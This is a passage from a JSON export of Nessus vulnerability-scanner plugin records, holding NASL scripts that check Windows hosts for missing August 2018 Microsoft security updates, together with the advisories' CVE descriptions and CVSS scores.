\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343898', '4343888');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343898, 4343888])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:53", "description": "The remote Windows host is missing security update 4343909.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377,\n CVE-2018-8387)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2018-8383)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8380,\n CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343909: Windows 10 Version 1803 and Windows Server Version 1803 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8387", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8380", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343909.NASL", "href": "https://www.tenable.com/plugins/nessus/111692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111692);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0952\",\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8377\",\n \"CVE-2018-8380\",\n \"CVE-2018-8381\",\n \"CVE-2018-8383\",\n \"CVE-2018-8385\",\n \"CVE-2018-8387\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8400\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_xref(name:\"MSKB\", value:\"4343909\");\n script_xref(name:\"MSFT\", value:\"MS18-4343909\");\n\n script_name(english:\"KB4343909: Windows 10 Version 1803 and Windows Server Version 1803 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343909.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377,\n CVE-2018-8387)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2018-8383)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8380,\n CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343909/windows-10-update-kb4343909\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3356f605\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343909 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343909');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343909])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:20:01", "description": "The remote Windows host is missing security update 4343899\nor cumulative update 4343900. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8342, CVE-2018-8343)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n 